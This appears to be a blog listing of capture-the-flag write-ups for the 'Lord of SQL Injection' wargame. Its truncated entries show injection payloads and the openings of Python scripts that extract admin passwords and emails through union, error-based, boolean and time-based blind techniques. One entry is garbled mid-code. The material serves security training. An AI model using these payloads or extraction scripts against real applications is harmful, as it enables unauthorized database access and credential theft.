HACKINTOANETWORK

WEB APPLICATION BUG HUNTER, PENETRATION TESTER

Wargame/Lord of SQL Injection

Prob Payload joinmail=1%27),(0,%27{},(select%20a%20from%20(select%20email%20as%20a%20from%20prob_phantom%20where%20no=1)%20as%20a))%23 Exploit import requests from bs4 import BeautifulSoup url = "https://los.rubiya.kr/chall/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php?" cookie = {'PHPSESSID':'o8k4eis6nm0q904ajkf4t2aiva'} def solve(): public_ip = requests.get("https://api.ipify.org").text query =..

2022. 10. 9.

Wargame/Lord of SQL Injection

Prob Payload pw=' or case when id='admin' and pw like '0dc4efbb%25' then 9e307*2 else 0 end%23 Exploit import requests import string url = "https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?" cookie = {'PHPSESSID':'gsbj486cdol37t3rvoo76ngrs8'} def find_pw(): passwd = "" for i in range(1, 9): for j in string.printable: query = "pw=' or case when id='admin' and pw like ..

2022. 10. 7.

Wargame/Lord of SQL Injection

Prob Payload pw=' or if(id='admin' and length(pw)=8,sleep(3),1)%23 pw=' or if(id='admin' and ascii(substr(pw,1,1))=65,sleep(3),1)%23 Exploit import requests import string import time url = "https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php?" cookie = {'PHPSESSID':'vhk3v05udt053p3tubi0jcpovl'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "pw=' or if(id='a..

2022. 10. 4.

Wargame/Lord of SQL Injection

Prob Payload id=%27||no right: no = mid print("no digit :" + str(no)) break if "Hello admin" in res.text: right = mid - 1 else: left = mid + 1 if __name__ == "__main__": no_len = no_length() find_no(no_len)

2022. 10. 4.

Wargame/Lord of SQL Injection

Prob Payload id=\&pw=%20union%20select%200x5c,0x756e696f6e2073656c65637420636861722839372c3130302c3130392c3130352c3131302923%23 Exploit import requests url = "https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?" cookie = {'PHPSESSID':'knuet88ncostg55skpsmfu42lf'} def solve(): query = "id=\&pw=%20union%20select%200x5c,0x756e696f6e2073656c65637420636861722839372c3130302c..

2022. 10. 3.

Wargame/Lord of SQL Injection

Prob Payload order=if(id='admin' and length(email)=1,1,9999) order=if(id='admin' and ascii(substr(email,1,1))=65,1,9999) Exploit import requests import string url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?" cookie = {'PHPSESSID':'1084h0d1455p666p0kkv1e6go7'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "order=if(id='admin' and length(email)={}..

2022. 10. 2.

Wargame/Lord of SQL Injection

Prob Payload order=if(id='admin' and length(email)=1,sleep(2),1) order=if(id='admin' and ascii(substr(email,1,1))=65,sleep(2),1) Exploit import requests import string import time url = "https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?" cookie = {'PHPSESSID':'h0kl663rsvsuorc7j50o24vbs8'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "order=if(id='admin' an..

2022. 10. 2.

Wargame/Lord of SQL Injection

Exploit import requests import string url = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?" cookie = {'PHPSESSID':'4rt3ocn9p7k7qv1irju9vo7kn3'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "pw=' or id='admin' and (select 1 union select (length(pw)={}))%23".format(pw_len) res = requests.get(url=url+query, cookies=cookie) print(query) if "query :" in re..

2022. 10. 1.

Wargame/Lord of SQL Injection

import requests import string url = "https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?" cookie = {'PHPSESSID':'dvhiksahmtcrnqtuh8hshv5dc4'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "pw=1' or id='admin' and if(length(pw)={},1,(select 1 union select 2))%23".format(pw_len) print(query) res = requests.get(url=url+query,cookies=cookie) if not 'Subquery' i..

2022. 9. 29.